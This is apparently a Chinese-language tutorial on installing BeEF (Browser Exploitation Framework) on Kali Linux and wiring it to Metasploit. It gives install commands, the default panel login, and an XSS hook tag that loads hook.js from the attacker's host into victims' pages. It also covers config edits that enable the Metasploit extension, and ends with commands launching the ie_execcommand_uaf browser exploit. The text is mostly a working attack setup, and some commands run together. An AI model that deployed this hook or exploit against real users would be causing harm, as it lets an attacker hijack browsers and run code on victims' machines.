Kali linux 系统默认未安装beef,需要自行安装
1 2 | apt-get updateapt-get install beef-xss |
启动/usr/share/beef-xss
1 2 | cd /usr/share/beef-xss./beef |
账号密码
127.0.0.1:3000/ui/pannel
beef/beef
嵌入代码
<script src="Ip:3000/hook.js">
与Metasploit联动
Beef配置文件
/usr/share/beef-xss/config.yaml
1 2 | metasploit:enable: false |
改成
1 2 | metasploit:enable: true |
vim /usr/share/beef-xss/extensions/metasploit/config.yaml
原:
1 | {os: 'custom', path: ''} |
修改成
1 | {os: 'custom', path: '/usr/share/metasploit-framework/'} |
修改 host callback_host两参数,改为beef主机IP
重启postgresq、metasploit、服务
1 | service postgresql restart & service metasploit restart |
msfconsole #启动Metasploit |
1 | load msgrpc ServerHost=IP Pass=abc123 |
MSF设置:
use exploit/windows/browser/ie_execcommand_uafshow optionsset srvhost IPexploit/run
